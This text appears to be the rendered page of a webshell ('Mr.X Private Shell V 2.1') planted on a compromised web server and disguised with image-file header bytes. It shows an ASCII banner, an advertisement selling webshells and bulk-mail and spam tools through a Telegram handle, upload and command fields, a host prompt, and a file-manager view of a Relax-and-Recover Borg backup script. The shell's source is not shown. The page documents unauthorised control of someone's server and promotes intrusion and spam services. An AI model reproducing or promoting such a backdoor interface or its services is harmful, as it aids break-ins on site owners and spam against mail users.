����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# This file is part of Relax-and-Recover, licensed under the GNU General
# Public License. Refer to the included COPYING for full text of license.
#
# 100_set_vars.sh

borg_set_vars

# If BORGBACKUP_HOST is not set, we automatically assume that USB device should
# be used as backup back end.
# borg_dst_dev will be set to mount point, where USB_DEVICE will be mounted
# in case of empty BORGBACKUP_HOST. While by non-zero BORGBACKUP_HOST we assume
# that SSH should be used as transfer protocol and borg_dst_dev becomes
# combined string of "BORGBACKUP_USERNAME@BORGBACKUP_HOST".
# borg_dst_dev directory will be created in later stage
# (if not already present) by 250_mount_usb.sh script.

if [[ -n $BORGBACKUP_HOST ]]; then
    borg_dst_dev=ssh://$BORGBACKUP_USERNAME@$BORGBACKUP_HOST:$BORGBACKUP_PORT
else
    # shellcheck disable=SC2034
    borg_dst_dev=$BUILD_DIR/borg_backup
fi

Filemanager

Name Type Size Permission Actions
100_set_vars.sh File 886 B 0644
200_prep_borg.sh File 1.18 KB 0644
250_mount_usb.sh File 517 B 0644
300_init_archive.sh File 2.74 KB 0644